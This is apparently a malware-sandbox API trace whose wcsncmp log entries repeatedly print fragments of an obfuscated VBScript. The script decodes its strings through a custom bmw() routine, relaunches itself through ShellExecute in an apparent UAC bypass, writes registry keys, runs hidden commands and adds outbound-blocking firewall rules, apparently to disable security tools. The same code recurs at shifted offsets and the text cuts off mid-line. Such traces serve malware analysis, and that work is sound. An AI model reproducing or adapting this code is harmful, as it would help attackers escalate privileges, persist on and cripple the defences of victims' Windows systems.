(fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.357] wcsncmp (_String1="Object(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.357] wcsncmp (_String1="bject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0226.357] wcsncmp (_String1="ject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93 [0226.357] wcsncmp (_String1="ect(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.357] wcsncmp (_String1="ct(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 